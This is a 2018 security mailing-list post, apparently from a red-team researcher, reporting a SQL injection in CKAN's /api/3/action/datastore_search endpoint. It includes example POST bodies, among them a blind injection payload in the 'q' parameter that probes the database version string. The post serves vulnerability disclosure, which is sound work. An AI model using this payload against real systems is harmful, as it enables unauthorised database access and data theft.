[CKAN-Security] SQL Injection Vulnerability

Gonzalo Garcia | ODS Red Team gonzalo.g at opendatasecurity.io
Fri Jun 8 10:37:40 UTC 2018


Hi, I've found a SQL Injection vulnerability on /api/3/action/datastore_search. I've exploited it on "q" parameter, but maybe other parameters are affected too.

Example POST data:
Query fails
{"resource_id":"38a8888c-30fd-4002-810e-6b7fe87a6fb2","q":" ' " ,"filters":{},"limit":100,"offset":0}

Query doesn't fail because PostgreSQL version string is "PostrgreSQL..." and "o" is the second char of the string.
{"resource_id":"38a8888c-30fd-4002-810e-6b7fe87a6fb2","q":"'|| (SELECT CASE substr(version(),2,1) WHEN 'o' THEN 'A' ELSE sleep(5) END) ||'" ,"filters":{},"limit":100,"offset":0}
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.okfn.org/mailman/private/security/attachments/20180608/151285fe/attachment.html>


More information about the Security mailing list